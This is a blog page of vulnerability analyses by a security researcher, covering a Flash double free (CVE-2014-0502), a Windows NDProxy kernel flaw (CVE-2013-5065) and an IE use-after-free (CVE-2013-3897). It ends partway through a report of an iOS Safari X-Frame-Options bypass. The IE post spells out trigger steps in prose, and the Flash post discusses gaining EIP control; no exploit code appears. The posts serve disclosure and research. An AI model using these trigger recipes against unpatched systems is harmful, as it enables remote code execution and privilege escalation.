<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;">Note: The issue is now fixed; it was reported through the Google bug bounty program.</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<br />
<span style="font-family: "arial" , "helvetica" , sans-serif;">Hope you enjoyed reading!</span><br />
</div>
<h2>
<span style="color: #f6b26b; font-family: Arial, Helvetica, sans-serif; font-size: x-large;">Deep Analysis of CVE-2014-0502 – A Double Free Story</span></h2>
<div class="MsoNormal">
<span style="font-family: Arial, sans-serif;">Published 2014-05-10.</span></div>
<div>
<div style="direction: ltr;">
<div style="direction: ltr;">
<br />
<div class="MsoNormal" style="direction: ltr; unicode-bidi: embed;">
<span style="font-family: Arial, sans-serif;">This post is about the Adobe Flash Player zero-day that was part of a targeted attack which infected several nonprofit organizations’ websites.</span><br />
<span style="font-family: Arial, sans-serif;"><br /></span>
<span style="font-family: Arial, sans-serif;">The vulnerability is a double-free vulnerability caused by a bug in how shared objects are handled by Adobe Flash Player.</span><br />
<span style="font-family: Arial, sans-serif;"><br /></span><span style="font-family: Arial, sans-serif; font-size: large;">The full story:</span><br />
<span style="font-family: Arial, sans-serif; font-size: large;"><u><a href="http://blog.spiderlabs.com/2014/03/deep-analysis-of-cve-2014-0502-a-double-free-story.html">http://blog.spiderlabs.com/2014/03/deep-analysis-of-cve-2014-0502-a-double-free-story.html</a></u></span><br />
<br />
<span style="font-family: Arial, sans-serif;">The double free occurs during the termination of an Adobe Flash worker. When a worker is terminated, all shared objects (also known as "Flash cookies") are flushed and then freed from memory. When flushing an oversized shared object (more than 100KB of data) to disk fails, garbage collection runs, and the garbage collector frees the shared object from memory while the first free operation is still in progress.</span><br />
<span style="font-family: Arial, sans-serif;"><br /></span>
<span style="font-family: Arial, sans-serif;">A screenshot showing a "record" shared object while exploiting the vulnerable code and controlling EIP (0xcccccccc+8):</span><br />
<div>
<span style="font-family: Arial, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEisaDV9s4LCTf471tSd_-Mp7EmhOTQirOOr7JnBkKb8OPk2ND-Q6SV8u0XP2a4w4wM5UBeOWDEsFUG4aim1avjIJEPO9cAu569js3-G8T4WeBRffKkju5HoDquSe5KDhRO7a-WrijwEp5A/s1600/006-crash+breakpoints.PNG" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEisaDV9s4LCTf471tSd_-Mp7EmhOTQirOOr7JnBkKb8OPk2ND-Q6SV8u0XP2a4w4wM5UBeOWDEsFUG4aim1avjIJEPO9cAu569js3-G8T4WeBRffKkju5HoDquSe5KDhRO7a-WrijwEp5A/s1600/006-crash+breakpoints.PNG" width="100%" /></a></div>
<span style="font-family: Arial, sans-serif;">The screenshot below shows the internal SharedObject destructor procedure; notice the flag that records whether data still has to be flushed to disk.</span><br />
<span style="font-family: Arial, sans-serif;">The SharedObject has data pending for flushing but fails to write it because the data exceeds the 100KB limit. During that flushing attempt, garbage collection fires and frees the object without clearing the "pending flush" flag.</span><br />
<span style="font-family: Arial, sans-serif;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEicBc-iw40QepQ12_xNdtDf_Yit8yFYa0TQwNqauWiJ9zNtDLs1XnlhJe2TkSCOc6T4YELgWrO5AzjZN0whZL0vWXYR3WtY0D2ss0tT0s6Cp4GGrODuBCJwL1BGwlhiKYfUZbGPPaMySmU/s1600/002-CrashIDAPro2.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEicBc-iw40QepQ12_xNdtDf_Yit8yFYa0TQwNqauWiJ9zNtDLs1XnlhJe2TkSCOc6T4YELgWrO5AzjZN0whZL0vWXYR3WtY0D2ss0tT0s6Cp4GGrODuBCJwL1BGwlhiKYfUZbGPPaMySmU/s1600/002-CrashIDAPro2.png" width="100%" /></a></div>
<span style="font-family: Arial, sans-serif;"><br /></span>
<span style="font-family: Arial, sans-serif;"><br />This specific flow leaves the “Pending Flush” flag set after the object has already been freed, so Adobe Flash Player later calls a function through a pointer read from freed memory. Once the freed chunk has been reclaimed with attacker-controlled data, that call becomes remote code execution. </span><br />
<span style="font-family: Arial, sans-serif;"><br /></span>
<span style="font-family: Arial, sans-serif;">I originally published this post on the SpiderLabs blog; for more details, read the<a href="http://blog.spiderlabs.com/2014/03/deep-analysis-of-cve-2014-0502-a-double-free-story.html"> full story</a>.</span><br />
<span style="font-family: Arial, sans-serif;"><br /></span>
<span style="font-family: Arial, sans-serif;"><br /></span>
<span style="font-family: Arial, sans-serif;"><br /></span></div>
</div>
</div>
</div>
[Ben Hayak]http://www.blogger.com/profile/09473158121408723877noreply@blogger.com3tag:blogger.com,1999:blog-7534521580510357281.post-54780528851713573052014-03-19T12:53:00.002+02:002014-05-10T18:09:55.708+03:00<h2>
<span style="color: #f6b26b; font-family: Arial, Helvetica, sans-serif; font-size: x-large;">The Kernel is calling a zero(day) pointer – CVE-2013-5065 – Ring Ring</span></h2>
<div>
<div style="direction: ltr;">
<div style="direction: ltr;">
<br />
<div class="MsoNormal" style="direction: ltr; unicode-bidi: embed;">
<span style="font-family: Arial, sans-serif;">Here's my analysis of a PDF file which contained two different vulnerabilities: a remote-code-execution vulnerability in Adobe Reader and a new escalation-of-privileges </span><span style="font-family: Arial, sans-serif;">zero-day </span><span style="font-family: Arial, sans-serif;">vulnerability in the Windows kernel.</span><br />
<span style="font-family: Arial, sans-serif;"><br /></span>
<span style="font-family: Arial, sans-serif; font-size: large;">The full story:</span><br />
<span style="font-family: Arial, sans-serif; font-size: large;"><a href="http://blog.spiderlabs.com/2013/12/the-kernel-is-calling-a-zeroday-pointer-cve-2013-5065-ring-ring.html">http://blog.spiderlabs.com/2013/12/the-kernel-is-calling-a-zeroday-pointer-cve-2013-5065-ring-ring.html</a></span><br />
<br />
<span style="font-family: Arial, sans-serif;">A flaw in the NDProxy driver's handling of Telephony Application Programming Interface (TAPI) operations was used to make the kernel dispatch a function from outside the bounds of its function table. By exploiting this vulnerability one could gain SYSTEM privileges and bypass various sandbox protections.</span><br />
<br />
<span style="font-family: Arial, sans-serif;"><i>The vulnerability allows index control of the following static function table, which gets executed in the kernel context:</i></span><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<span style="font-family: Arial, sans-serif;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjOlKh-bxfTrC6CTxd0vFCze5_jkt3Jhq9W5dmQEMqc7pM2Xpnebwhk-zVwbVObW656IApXw-1fJMn3csEnpyo72Sr2DWbsUvTuHOElcFQ3sWV1_GWRxzBOVakTgovWAyfvrZwv_XmrWyE/s1600/Capture.PNG" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjOlKh-bxfTrC6CTxd0vFCze5_jkt3Jhq9W5dmQEMqc7pM2Xpnebwhk-zVwbVObW656IApXw-1fJMn3csEnpyo72Sr2DWbsUvTuHOElcFQ3sWV1_GWRxzBOVakTgovWAyfvrZwv_XmrWyE/s1600/Capture.PNG" width="100%" /></a></span></div>
<br />
<i style="font-family: Arial, sans-serif; text-align: center;">Dispatching the invalid PxTapi function results in an access to address 0x0 in memory and a crash:</i><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi0AJcnWIIsuGL33PX0AVzL97hHN95NFqTz0i_dGIYdV9MV7Uo-96ILyB7dhi8S9X0M41t9nwWnE6IQlrrmFSc2Pn5WP7-jsoVHJI_JjGHw81Uc2oB5ZsLHZ8XXP7jsC6eXCnpt3HOE26M/s1600/6a0133f264aa62970b019b029d1cc7970d.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi0AJcnWIIsuGL33PX0AVzL97hHN95NFqTz0i_dGIYdV9MV7Uo-96ILyB7dhi8S9X0M41t9nwWnE6IQlrrmFSc2Pn5WP7-jsoVHJI_JjGHw81Uc2oB5ZsLHZ8XXP7jsC6eXCnpt3HOE26M/s1600/6a0133f264aa62970b019b029d1cc7970d.png" width="100%" /></a></div>
<br /></div>
<div class="MsoNormal" style="direction: ltr; unicode-bidi: embed;">
<br /></div>
</div>
</div>
</div>
[Ben Hayak]http://www.blogger.com/profile/09473158121408723877noreply@blogger.com0tag:blogger.com,1999:blog-7534521580510357281.post-39150832013310336672013-11-10T11:47:00.002+02:002014-05-10T18:09:40.827+03:00<h2>
<span style="color: #f6b26b; font-family: Arial, Helvetica, sans-serif; font-size: x-large;">The Technical Aspects of Exploiting IE Zero-Day CVE-2013-3897</span></h2>
<div>
<div style="direction: ltr;">
<div style="direction: ltr;">
<br />
<div class="MsoNormal" style="direction: ltr; unicode-bidi: embed;">
<span style="font-family: Helvetica, Verdana, 'Arial sans-serif'; font-size: 15.555556297302246px; line-height: 18.64583396911621px;">Just last month, during our work at SpiderLabs Research, the team and I had the chance to analyze the CVE-2013-3897 use-after-free vulnerability.</span><br />
<span style="font-family: Helvetica, Verdana, Arial sans-serif;"><span style="line-height: 18.64583396911621px;">This vulnerability was basically the result of an object of type CDisplayPointer being freed and used again when a rich-text element tries to scroll the pointer into the current view.</span></span><br />
<span style="font-family: Helvetica, Verdana, Arial sans-serif;"><span style="line-height: 18.64583396911621px;">A flow that includes a selection </span></span><span style="font-family: Helvetica, Verdana, 'Arial sans-serif'; line-height: 18.64583396911621px;">occurring inside an "onpropertychange" event handler, together with a DOM that contains a textarea structure (detailed below), results in possible remote code execution.</span><br />
<br />
<b style="color: #999999; font-family: Arial; font-size: xx-large;">Breaking it down</b></div>
<div class="MsoNormal" style="direction: ltr; unicode-bidi: embed;">
<div style="font-family: Helvetica, Verdana, 'Arial sans-serif'; font-size: 15px; line-height: 18.65625px; margin-bottom: 15px; margin-top: 15px;">
<span style="font-size: 15px; line-height: 18.65625px;">1. Create a </span><em style="font-size: 15px; line-height: 18.65625px;">TEXTAREA </em><span style="font-size: 15px; line-height: 18.65625px;">and apply a different element as a child using </span><em style="font-size: 15px; line-height: 18.65625px;">applyElement</em><span style="font-size: 15px; line-height: 18.65625px;">. This will place the </span><em style="font-size: 15px; line-height: 18.65625px;">address</em><span style="font-size: 15px; line-height: 18.65625px;"> element as the child of the </span><em style="font-size: 15px; line-height: 18.65625px;">textarea</em><span style="font-size: 15px; line-height: 18.65625px;"> element.</span></div>
<a class="asset-img-link" href="http://npercoco.typepad.com/.a/6a0133f264aa62970b019affead214970b-pi" style="color: #0099ff; display: inline; font-family: Helvetica, Verdana, 'Arial sans-serif'; font-size: 15px; line-height: 18.65625px;"><img alt="Steps1" class="asset asset-image at-xid-6a0133f264aa62970b019affead214970b" src="http://npercoco.typepad.com/.a/6a0133f264aa62970b019affead214970b-500wi" style="border: 0px;" title="Steps1" width="100%" /></a><br />
<div style="font-family: Helvetica, Verdana, 'Arial sans-serif'; font-size: 15px; line-height: 18.65625px; margin-bottom: 15px; margin-top: 15px;">
2. Trigger a <em>select</em> event on the <em>TEXTAREA</em> element to create an instance of DisplayPointer.</div>
<a class="asset-img-link" href="http://npercoco.typepad.com/.a/6a0133f264aa62970b019affead477970c-pi" style="color: #0099ff; display: inline; font-family: Helvetica, Verdana, 'Arial sans-serif'; font-size: 15px; line-height: 18.65625px;"><img alt="Steps2" class="asset asset-image at-xid-6a0133f264aa62970b019affead477970c" src="http://npercoco.typepad.com/.a/6a0133f264aa62970b019affead477970c-500wi" style="border: 0px;" title="Steps2" width="100%" /></a><br />
<div style="font-family: Helvetica, Verdana, 'Arial sans-serif'; font-size: 15px; line-height: 18.65625px; margin-bottom: 15px; margin-top: 15px;">
3. Inside the <em>onselect</em> event handler, change the <em>value</em> property of the <em>TEXTAREA</em> element, which in turn fires the <em>onpropertychange</em> event. For example, using <em>appendChild</em> or <em>swapNode</em> will cause this behavior.</div>
<div style="font-family: Helvetica, Verdana, 'Arial sans-serif'; font-size: 15px; line-height: 18.65625px; margin-bottom: 15px; margin-top: 15px;">
<a class="asset-img-link" href="http://npercoco.typepad.com/.a/6a0133f264aa62970b019affead4e2970c-pi" style="color: #0099ff; display: inline;"><img alt="Steps3" class="asset asset-image at-xid-6a0133f264aa62970b019affead4e2970c" src="http://npercoco.typepad.com/.a/6a0133f264aa62970b019affead4e2970c-500wi" style="border: 0px;" title="Steps3" width="100%" /></a></div>
<div style="font-family: Helvetica, Verdana, 'Arial sans-serif'; font-size: 15px; line-height: 18.65625px; margin-bottom: 15px; margin-top: 15px;">
Notice that id_2 (the “<em>address</em>” element) is a child of the <em>TEXTAREA</em> element. By swapping that element we remove it from the layout of the textarea and insert a different element, so the <em>value</em> property changes.</div>
<div style="font-family: Helvetica, Verdana, 'Arial sans-serif'; font-size: 15px; line-height: 18.65625px; margin-bottom: 15px; margin-top: 15px;">
4. The <em>onpropertychange</em> event is triggered.</div>
<div style="font-family: Helvetica, Verdana, 'Arial sans-serif'; font-size: 15px; line-height: 18.65625px; margin-bottom: 15px; margin-top: 15px;">
<a class="asset-img-link" href="http://npercoco.typepad.com/.a/6a0133f264aa62970b019affeb4a7f970d-pi" imageanchor="1" style="color: #0099ff; display: inline;"><img alt="Steps4" class="asset asset-image at-xid-6a0133f264aa62970b019affeb4a7f970d" src="http://npercoco.typepad.com/.a/6a0133f264aa62970b019affeb4a7f970d-500wi" style="border: 0px;" title="Steps4" width="100%" /></a></div>
<div style="font-family: Helvetica, Verdana, 'Arial sans-serif'; font-size: 15px; line-height: 18.65625px; margin-bottom: 15px; margin-top: 15px;">
5. In the next stage we basically need to change the position of the display pointer within the <em>TEXTAREA </em>layout. In the original exploit <em>document.execCommand(“UnSelect”)</em> was used. However, selecting a different element, executing the <em>SelectAll</em> command or any operation that causes a DisplayPointer position change will also work. </div>
<div style="font-family: Helvetica, Verdana, 'Arial sans-serif'; font-size: 15px; line-height: 18.65625px; margin-bottom: 15px; margin-top: 15px;">
<a class="asset-img-link" href="http://npercoco.typepad.com/.a/6a0133f264aa62970b019affead47a970b-pi" imageanchor="1" style="color: #0099ff; display: inline;"><img alt="1" class="asset asset-image at-xid-6a0133f264aa62970b019affead47a970b" src="http://npercoco.typepad.com/.a/6a0133f264aa62970b019affead47a970b-500wi" style="border: 0px;" title="1" width="100%" /></a><br />
<div class="photo-caption caption-xid-6a0133f264aa62970b019affead47a970b" id="caption-xid-6a0133f264aa62970b019affead47a970b" style="font-family: inherit; font-size: 14px; font-style: italic; line-height: 1.4em; padding: 10px 0px;">
The attacker used "UnSelect" command</div>
</div>
<div style="font-family: Helvetica, Verdana, 'Arial sans-serif'; font-size: 15px; line-height: 18.65625px; margin-bottom: 15px; margin-top: 15px;">
6. The JavaScript selection causes a call to CDisplayPointer::ScrollIntoView, which tries to set a new position for the DisplayPointer. At this stage the CMarkupPointer reference has already been released by CDisplayPointer::Release (as a result of the “UnSelect” command), so the dangling pointer refers to freed heap memory that the attacker can reclaim with controlled data.</div>
<div style="font-family: Helvetica, Verdana, 'Arial sans-serif'; font-size: 15px; line-height: 18.65625px; margin-bottom: 15px; margin-top: 15px;">
The flow eventually gets into QIClassID, which tries to execute “CMarkupPointer::QueryInterface” (located at offset 0x0 in CMarkupPointer’s virtual table).</div>
<div style="font-family: Helvetica, Verdana, 'Arial sans-serif'; font-size: 15px; line-height: 18.65625px; margin-bottom: 15px; margin-top: 15px;">
QIClassID (use): </div>
<div style="font-family: Helvetica, Verdana, 'Arial sans-serif'; font-size: 15px; line-height: 18.65625px; margin-bottom: 15px; margin-top: 15px;">
</div>
<div style="font-family: Helvetica, Verdana, 'Arial sans-serif'; font-size: 15px; line-height: 18.65625px; margin-bottom: 15px; margin-top: 15px;">
<a class="asset-img-link" href="http://npercoco.typepad.com/.a/6a0133f264aa62970b019affead5a3970b-pi" imageanchor="1" style="color: #0099ff;"><img alt="Blog 2" class="asset asset-image at-xid-6a0133f264aa62970b019affead5a3970b" src="http://npercoco.typepad.com/.a/6a0133f264aa62970b019affead5a3970b-500wi" style="border: 0px;" title="Blog 2" width="100%" /></a><br />
<div class="photo-caption caption-xid-6a0133f264aa62970b019affead5a3970b" id="caption-xid-6a0133f264aa62970b019affead5a3970b" style="font-family: inherit; font-size: 14px; font-style: italic; line-height: 1.4em; padding: 10px 0px;">
QIClassID disassemble crash point</div>
</div>
<br style="font-family: Helvetica, Verdana, 'Arial sans-serif'; font-size: 15px; line-height: 18.65625px;" />
<div style="font-family: Helvetica, Verdana, 'Arial sans-serif'; font-size: 15px; line-height: 18.65625px; margin-bottom: 15px; margin-top: 15px;">
</div>
<div style="font-family: Helvetica, Verdana, 'Arial sans-serif'; font-size: 15px; line-height: 18.65625px; margin-bottom: 15px; margin-top: 15px;">
At the crash we end up with the following stack trace:</div>
<div style="font-family: Helvetica, Verdana, 'Arial sans-serif'; font-size: 15px; line-height: 18.65625px; margin-bottom: 15px; margin-top: 15px;">
<a href="http://npercoco.typepad.com/.a/6a0133f264aa62970b019affead605970b-pi" imageanchor="1"><img alt="Stack" src="http://npercoco.typepad.com/.a/6a0133f264aa62970b019affead605970b-500wi" style="border: 0px;" title="Stack" width="100%" /></a></div>
<div style="font-family: Helvetica, Verdana, 'Arial sans-serif'; font-size: 15px; line-height: 18.65625px; margin-bottom: 15px; margin-top: 15px;">
<br /></div>
<div style="font-family: Helvetica, Verdana, 'Arial sans-serif'; font-size: 15px; line-height: 18.65625px; margin-bottom: 15px; margin-top: 15px;">
CMarkupPointer freed and then used by QIClassID:</div>
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgwgC-XBgyF9SG1L80IsRqd3T0LEqD8qpQaGyvugHgay1JQKUTqIVrAUVtvT3CrQQ8LS9z5FDfnPGaGktDbCYKzkLOu9jhc1VEZedikP-z4eSqlSGgngaHhG1qFuFqc-R0rmxfkfVIXnXY/s1600/blog1.PNG" imageanchor="1"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgwgC-XBgyF9SG1L80IsRqd3T0LEqD8qpQaGyvugHgay1JQKUTqIVrAUVtvT3CrQQ8LS9z5FDfnPGaGktDbCYKzkLOu9jhc1VEZedikP-z4eSqlSGgngaHhG1qFuFqc-R0rmxfkfVIXnXY/s400/blog1.PNG" width="100%" /></a>
</div>
<span style="font-family: Arial;">Most of this post was originally published here:</span><br />
(<a href="http://blog.spiderlabs.com/2013/10/ie-zero-day-cve-2013-3897-technical-aspects.html" target="_blank">http://blog.spiderlabs.com/2013/10/ie-zero-day-cve-2013-3897-technical-aspects.html</a>)<br />
<span style="font-family: Arial, sans-serif;"><br /></span>
<span style="font-family: Arial, sans-serif;"><br /></span></div>
</div>
</div>
[Ben Hayak]http://www.blogger.com/profile/09473158121408723877noreply@blogger.com0tag:blogger.com,1999:blog-7534521580510357281.post-41308673589241413672013-02-11T02:37:00.001+02:002013-02-11T10:49:46.674+02:00X-Framing them all! - Cross-Framing is "impossible" - Apple’s iOS 5<h2>
<span class="Apple-style-span" style="color: #f6b26b; font-family: Arial, Helvetica, sans-serif;"><span style="font-size: x-large;">Cross Framing Google, Facebook and whoever you wish.</span><span style="font-size: large;"> </span></span></h2>
<div>
<div style="direction: ltr;">
<div style="direction: ltr;">
<br />
<div class="MsoNormal" style="direction: ltr; unicode-bidi: embed;">
<span style="color: #999999; font-family: Arial; font-size: x-large;"><b>Jailbreak your device, or buy Android?</b></span></div>
<div class="MsoNormal" style="direction: ltr; unicode-bidi: embed;">
<span style="font-family: "Arial","sans-serif"; mso-ascii-theme-font: minor-bidi; mso-bidi-font-family: Arial; mso-bidi-theme-font: minor-bidi; mso-hansi-theme-font: minor-bidi;"><br /></span></div>
<div class="MsoNormal" style="direction: ltr; unicode-bidi: embed;">
<span style="font-family: "Arial","sans-serif"; mso-ascii-theme-font: minor-bidi; mso-bidi-font-family: Arial; mso-bidi-theme-font: minor-bidi; mso-hansi-theme-font: minor-bidi;">This post is mostly for people who own an iPhone, iPad, iPod or any other iDevice.</span></div>
<div class="MsoNormal" style="direction: ltr; unicode-bidi: embed;">
<span style="font-family: "Arial","sans-serif"; mso-ascii-theme-font: minor-bidi; mso-bidi-font-family: Arial; mso-bidi-theme-font: minor-bidi; mso-hansi-theme-font: minor-bidi;"><br /></span></div>
<div class="MsoNormal" style="direction: ltr; unicode-bidi: embed;">
<span style="font-family: "Arial","sans-serif"; mso-ascii-theme-font: minor-bidi; mso-bidi-font-family: Arial; mso-bidi-theme-font: minor-bidi; mso-hansi-theme-font: minor-bidi;">Today, at least for most people, jailbreaking is a serious consideration, and in my experience it can even decide whether someone buys an iOS (Apple) or an Android (Google) device.</span><br />
<span style="font-family: "Arial","sans-serif"; mso-ascii-theme-font: minor-bidi; mso-bidi-font-family: Arial; mso-bidi-theme-font: minor-bidi; mso-hansi-theme-font: minor-bidi;">Quite a few differences come to mind; one bold example is that the exact same application (WhatsApp, for example) is free on a smart device running Android but costs money on an iDevice unless it is jailbroken.<o:p></o:p></span></div>
<div class="MsoNormal" style="direction: ltr; unicode-bidi: embed;">
<span style="font-family: "Arial","sans-serif"; mso-ascii-theme-font: minor-bidi; mso-bidi-font-family: Arial; mso-bidi-theme-font: minor-bidi; mso-hansi-theme-font: minor-bidi;">Some people even say that the lack of a jailbreak for the iPhone 5 may have affected Apple's sales. From the New York Times article on Apple's earnings:</span></div>
<div class="MsoNormal" style="direction: ltr; unicode-bidi: embed;">
<span style="font-family: Arial, sans-serif; font-size: x-small;"><span style="line-height: 14px;"><i>“Once-euphoric investors, who pushed Apple’s stock to a record high of $702.10 last September, have become nervous, and in early trading on Thursday, the stock traded at $455.89, down more than 34 percent from its peak.” (http://www.nytimes.com/2013/01/24/technology/apple-earnings.html)</i></span></span></div>
<div class="MsoNormal" style="direction: ltr; unicode-bidi: embed;">
<span style="font-family: Arial, sans-serif; font-size: 9pt; line-height: 115%;"><br /></span></div>
<div class="MsoNormal" style="direction: ltr; unicode-bidi: embed;">
<span style="font-family: Arial, sans-serif; font-size: 9pt; line-height: 115%;"><br /></span></div>
<div class="MsoNormal" style="direction: ltr; unicode-bidi: embed;">
<span style="color: #999999; font-family: Arial; font-size: x-large;"><b>Are you behind? iOS 5.1.1? 6.0.1?</b></span></div>
<div class="MsoNormal" style="direction: ltr; unicode-bidi: embed;">
<br /></div>
<div class="MsoNormal" style="direction: ltr; unicode-bidi: embed;">
<span style="font-family: "Arial","sans-serif"; mso-ascii-theme-font: minor-bidi; mso-bidi-font-family: Arial; mso-bidi-theme-font: minor-bidi; mso-hansi-theme-font: minor-bidi;">
Since the only things that would convince us to upgrade to iOS 6 are updates you <b>already
have</b> through your installed Cydia tweaks, people just </span><span style="font-family: Arial, sans-serif;">“stay behind” </span><span style="font-family: Arial, sans-serif;">and use iOS 5.1.1 or lower </span><span style="font-family: Arial, sans-serif;">to
keep a nicely jailbroken iPhone. </span><br />
<span style="font-family: "Arial","sans-serif"; mso-ascii-theme-font: minor-bidi; mso-bidi-font-family: Arial; mso-bidi-theme-font: minor-bidi; mso-hansi-theme-font: minor-bidi;"><br /></span></div>
<div class="MsoNormal" style="direction: ltr; unicode-bidi: embed;">
<span style="font-family: "Arial","sans-serif"; mso-ascii-theme-font: minor-bidi; mso-bidi-font-family: Arial; mso-bidi-theme-font: minor-bidi; mso-hansi-theme-font: minor-bidi;"><b>So you use iOS 5 or lower? Are you safe?<o:p></o:p></b></span></div>
<div class="MsoNormal" style="direction: ltr; unicode-bidi: embed;">
<span style="font-family: "Arial","sans-serif"; mso-ascii-theme-font: minor-bidi; mso-bidi-font-family: Arial; mso-bidi-theme-font: minor-bidi; mso-hansi-theme-font: minor-bidi;">Today we already know there are many web application
vulnerabilities around; client-side attacks, and cross-site scripting in particular,
have become some of the most common attacks in recent years.<br /><br />
Google, Facebook, Microsoft, PayPal, Mozilla, Apple and many other great
companies have tried to fight these security risks and give us, their customers, the means to keep our data safe. <o:p></o:p></span></div>
<div class="MsoNormal" style="direction: ltr; unicode-bidi: embed;">
<span style="font-family: "Arial","sans-serif"; mso-ascii-theme-font: minor-bidi; mso-bidi-font-family: Arial; mso-bidi-theme-font: minor-bidi; mso-hansi-theme-font: minor-bidi;"><span style="color: #ffd966;">But do they?</span><o:p></o:p></span></div>
<div class="MsoNormal" style="direction: ltr; unicode-bidi: embed;">
<span style="font-family: "Arial","sans-serif"; mso-ascii-theme-font: minor-bidi; mso-bidi-font-family: Arial; mso-bidi-theme-font: minor-bidi; mso-hansi-theme-font: minor-bidi;">Many web application developers have had to <span style="color: #ffd966;">deal with many different
client-side attacks and design</span> their security architecture to protect their
users and fend off hacking attempts targeting their customers, since
some attacks, such as <span style="color: #ffd966;">clickjacking (including attacks that defeat frame-busting), multi-stage attacks and self-XSS
exploitation</span>, are not easy to deal with and require <b><span style="color: #9fc5e8;">browser cooperation</span></b>.<o:p></o:p></span></div>
<div class="MsoNormal" style="direction: ltr; unicode-bidi: embed;">
<span style="font-family: "Arial","sans-serif"; mso-ascii-theme-font: minor-bidi; mso-bidi-font-family: Arial; mso-bidi-theme-font: minor-bidi; mso-hansi-theme-font: minor-bidi;">There are quite a few client-side security mechanisms, such as anti-XSS
filters (NoScript, the XSS Auditor), the Same-Origin Policy, various security headers, caching controls, and the <span style="color: #ffd966;">X-Frame-Options
header, which tells the browser whether a response may be rendered
inside a frame.</span><o:p></o:p></span></div>
<div class="MsoNormal" style="direction: ltr; unicode-bidi: embed;">
<br /></div>
<div class="MsoNormal" style="direction: ltr; unicode-bidi: embed;">
<br /></div>
<div class="MsoNormal" style="direction: ltr; unicode-bidi: embed;">
<span style="color: #999999; font-family: Arial; font-size: x-large;"><b>Safari on your iPhone(or iDevice) – you <u>CHOOSE </u>to stay vulnerable:</b></span></div>
<div class="MsoNormal" style="direction: ltr; unicode-bidi: embed;">
<br /></div>
<div class="MsoNormal" style="direction: ltr; unicode-bidi: embed;">
<span style="font-family: "Arial","sans-serif"; mso-ascii-theme-font: minor-bidi; mso-bidi-font-family: Arial; mso-bidi-theme-font: minor-bidi; mso-hansi-theme-font: minor-bidi;">So the web developers at Google, Facebook, PayPal or anywhere else (including
myself) can rely on browser-implemented security features to protect their
pages from client-side attacks, mostly clickjacking and staging attacks,
with<span style="color: #ffd966;"> X-Frame-Options,</span> setting it so that the page content will <span style="color: #ffd966;">only be
displayed when the request comes from a frame on the same origin</span>, or disabling
framing completely, and then consider everything secure. What we unfortunately forget is that this protection rests entirely on the browser's client-side security. </span><br />
<span style="font-family: "Arial","sans-serif"; mso-ascii-theme-font: minor-bidi; mso-bidi-font-family: Arial; mso-bidi-theme-font: minor-bidi; mso-hansi-theme-font: minor-bidi;"><br /></span>
<span style="font-family: "Arial","sans-serif"; mso-ascii-theme-font: minor-bidi; mso-bidi-font-family: Arial; mso-bidi-theme-font: minor-bidi; mso-hansi-theme-font: minor-bidi;"><span style="color: #eeeeee;"><b>What if the browser fails?</b></span><o:p></o:p></span></div>
<div class="MsoNormal" style="direction: ltr; unicode-bidi: embed;">
<span style="font-family: "Arial","sans-serif"; mso-ascii-theme-font: minor-bidi; mso-bidi-font-family: Arial; mso-bidi-theme-font: minor-bidi; mso-hansi-theme-font: minor-bidi;">I reported to Apple two months ago, on 06/12/12, that I had discovered
that even though the web server (in this example “www.google.com”) sets the HTTP
response header X-Frame-Options to SAMEORIGIN, the response is still displayed on my iDevice.<o:p></o:p></span></div>
<div class="MsoNormal" style="direction: ltr; unicode-bidi: embed;">
<span style="font-family: "Arial","sans-serif"; mso-ascii-theme-font: minor-bidi; mso-bidi-font-family: Arial; mso-bidi-theme-font: minor-bidi; mso-hansi-theme-font: minor-bidi;"><br /></span></div>
<div class="MsoNormal" style="direction: ltr; unicode-bidi: embed;">
<span style="font-family: "Arial","sans-serif"; mso-ascii-theme-font: minor-bidi; mso-bidi-font-family: Arial; mso-bidi-theme-font: minor-bidi; mso-hansi-theme-font: minor-bidi;">As you can see in the following HTTP response, captured while sending an
HTTP request to Google.com:<o:p></o:p></span></div>
<div class="MsoNormal" style="direction: ltr; unicode-bidi: embed;">
<span style="font-family: "Arial","sans-serif"; mso-ascii-theme-font: minor-bidi; mso-bidi-font-family: Arial; mso-bidi-theme-font: minor-bidi; mso-hansi-theme-font: minor-bidi;"><br /></span></div>
<div class="MsoNormal" style="direction: ltr; unicode-bidi: embed;">
<span style="font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%; mso-ascii-theme-font: minor-bidi; mso-bidi-font-family: Arial; mso-bidi-theme-font: minor-bidi; mso-hansi-theme-font: minor-bidi;"><span style="color: orange;">HTTP/1.1 200 OK<br />
Date: Thu, 06 Dec 2012 15:54:50 GMT<br />
Expires: -1<br />
Cache-Control: private, max-age=0<br />
Content-Type: text/html; charset=UTF-8<br />
Server: gws<br />
X-XSS-Protection: 1; mode=block</span><br />
<span style="color: #f3f3f3;"><b>X-Frame-Options: SAMEORIGIN</b></span><br /><span style="color: orange;">
Content-Length: 99283 <o:p></o:p></span></span></div>
<div class="MsoNormal" style="background-repeat: initial initial; direction: ltr; unicode-bidi: embed;">
